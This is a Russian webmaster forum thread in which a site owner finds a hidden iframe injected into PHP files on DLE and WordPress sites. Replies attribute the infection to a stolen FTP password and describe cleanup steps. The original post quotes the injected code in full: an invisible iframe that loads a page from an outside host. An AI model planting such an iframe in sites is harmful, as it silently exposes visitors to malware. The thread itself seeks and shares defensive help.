Вирус лезет на сайты!

MK
На сайте с 13.08.2009
Offline
13
692

сегодня утром лезу на сови сайты и на 5некоторых вижу ошибки страницы не грузятся. Начал лазить в кодах и нашел вот этот код <iframe src="http://3ci.ru:8080/index.php" width=189 height=188 style="visibility: hidden"></iframe>

на движке Dle нашел пока в index.php на wordpress поражены почти все файлы расширения .php при этом при удаление этого кода на wordpress страница все таки запустилась и даже админка но кодировка не совпадает. если в браузере менять на юникод то отбражается но при переходе на другую все также возращается. заметил что код сам залазиет снова в код. Во всех файлах код находится в самом низу. Подкажите что делать и как бороться с этой гадостью!!! И в чем причина этой напасти. код обнаружил на всех сайтах. Да явный признак этого кода лмбо страница не грузится либо в самом низу кода страница должна закончится по шаблону она продалжается сантиметров на 5-10

ewg777
На сайте с 04.06.2007
Offline
225
#1

Поиск: Ключевые слова: iframe ; Раздел: Веб-строительство и подразделы:

/ru/forum/comment/5280878

/ru/forum/334688

/ru/forum/377445

/ru/forum/366056

vedomir
На сайте с 01.07.2004
Offline
167
#2

Пароль FTP украли.

1. Найти чистый компьютер, поменять пароль на FTP зараженного сайта (срочно пока сайт не выкинули из гугля например)

2. Вычистить сайт - вирус поражает файлы начинающиеся на index home default main с расширениями php htm html и видимо asp

3. Поставить и тщатеельно проверить антивирусом все рабочие компьютеры, с которых идет работа с сайтом.

MK
На сайте с 13.08.2009
Offline
13
#3

Спасибо всем за информацию. код весь удалил. суппорт проверил на вирусы сайты и указал в каких файлах вредоносный код. Теперь вроде норм. Но яша гад прислал письмо что на сайте вредоносный код.

ImPER@ToR
На сайте с 15.03.2009
Offline
159
#4

Почему же гад... Он вам наоборот помочь хочет. Так сказать среагировал и сразу к вам.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий